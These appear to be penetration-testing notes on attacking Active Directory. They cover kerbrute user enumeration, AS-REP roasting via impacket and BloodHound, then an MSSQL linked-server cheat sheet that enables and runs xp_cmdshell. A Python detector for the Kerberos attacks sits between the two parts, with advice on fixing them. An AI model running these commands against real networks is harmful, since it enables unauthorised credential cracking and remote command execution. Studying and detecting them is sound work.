After enumerating all the user names, it's time to identify which of them actually exist as accounts in the domain we are testing.
This can be done with kerbrute:
# add the domain name from the nmap output to the /etc/hosts file first
kerbrute userenum -d domainname --dc domainname usernames.txt -o valid_users.txt
Now filter the valid users out of the kerbrute output and save them to a new file:
awk '{print $7}' valid_users.txt > users
With the user names in hand, we can enumerate which accounts are configured with "Do not require Kerberos preauthentication" using GetNPUsers.py from impacket, which outputs the user's AS-REP (the encrypted TGT reply); this can be cracked offline to recover that user's password.
Once these steps stop yielding anything useful, and we hold credentials for a domain user, we can query the domain with BloodHound to collect information that helps with exploitation.
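As an added example (not part of the original notes), the defender-side view of the two steps above: both the kerbrute sweep and the AS-REP request leave a footprint in Windows Security event 4768 (Kerberos TGT requested). The log lines below are constructed, flattened key=value stand-ins for that event, and the signatures assumed are the standard ones: a successful 4768 with PreAuthType 0 and RC4 (0x17) ticket encryption for AS-REP roasting, and a burst of 0x6 (client principal unknown) failures from one source for user enumeration.

```python
import re
from collections import Counter

# Constructed sample lines (not real log data) shaped like event 4768 fields.
SAMPLE_4768 = [
    "EventID=4768 TargetUserName=alice IpAddress=10.0.0.5 PreAuthType=2 TicketEncryptionType=0x12 Status=0x0",
    "EventID=4768 TargetUserName=svc_backup IpAddress=10.0.0.99 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0",
    "EventID=4768 TargetUserName=nosuchuser1 IpAddress=10.0.0.99 PreAuthType=0 TicketEncryptionType=0x17 Status=0x6",
    "EventID=4768 TargetUserName=nosuchuser2 IpAddress=10.0.0.99 PreAuthType=0 TicketEncryptionType=0x17 Status=0x6",
    "EventID=4768 TargetUserName=nosuchuser3 IpAddress=10.0.0.99 PreAuthType=0 TicketEncryptionType=0x17 Status=0x6",
    "EventID=4768 TargetUserName=carol IpAddress=10.0.0.7 PreAuthType=2 TicketEncryptionType=0x12 Status=0x6",
    "EventID=4769 TargetUserName=alice IpAddress=10.0.0.5 TicketEncryptionType=0x12 Status=0x0",
]


def parse_event(line):
    """Turn one flattened key=value line into a dict of field -> value."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def asrep_roast_candidates(lines):
    """Accounts whose TGT was issued with no pre-authentication and RC4 encryption.

    That combination is what an AS-REP roasting request against a
    DONT_REQ_PREAUTH account looks like; a 4768 with PreAuthType 0 and
    AES (0x12) is far less useful to an attacker and is not flagged here.
    """
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4768" or ev.get("Status", "").lower() != "0x0":
            continue
        if ev.get("PreAuthType") == "0" and ev.get("TicketEncryptionType", "").lower() == "0x17":
            hits.append(ev["TargetUserName"])
    return hits


def user_enum_sources(lines, threshold=3):
    """Source IPs with at least `threshold` 4768 failures for unknown principals (0x6).

    A kerbrute userenum run produces exactly this pattern: many distinct
    non-existent names from one client in a short window. The threshold is
    an assumed tuning value; real deployments would also bound it by time.
    """
    counts = Counter()
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") == "4768" and ev.get("Status", "").lower() == "0x6":
            counts[ev.get("IpAddress", "?")] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}
```

The fix on the directory side is the same for both findings: clear "Do not require Kerberos preauthentication" on the flagged accounts and make sure they hold strong passwords, and treat enumeration sources as hosts to investigate.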
# https://github.com/NetSPI/PowerUpSQL
Get-SQLServerLink -Instance server -Verbose
powershell.exe -c "Import-Module C:\Users\Public\PowerUpSQL.ps1; Invoke-SQLEscalatePriv -Verbose -Instance ECORP\sql"
# To list linked servers
select srvname from master..sysservers;
# Native
Get-SQLServerLinkCrawl -Instance server -Query "exec master..xp_cmdshell 'whoami'"
# Linked database tables
select * from openquery("ECORP\FOO", 'select TABLE_NAME from FOO.INFORMATION_SCHEMA.TABLES')
# You can also use the Metasploit module exploit/windows/mssql/mssql_linkcrawler
# With that module you can find linked databases and whether you are admin on them
# List the linked servers of the remote instance, then (as admin) try to enable xp_cmdshell on it
select * from openquery("server", 'select * from master..sysservers')
EXECUTE ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT "server"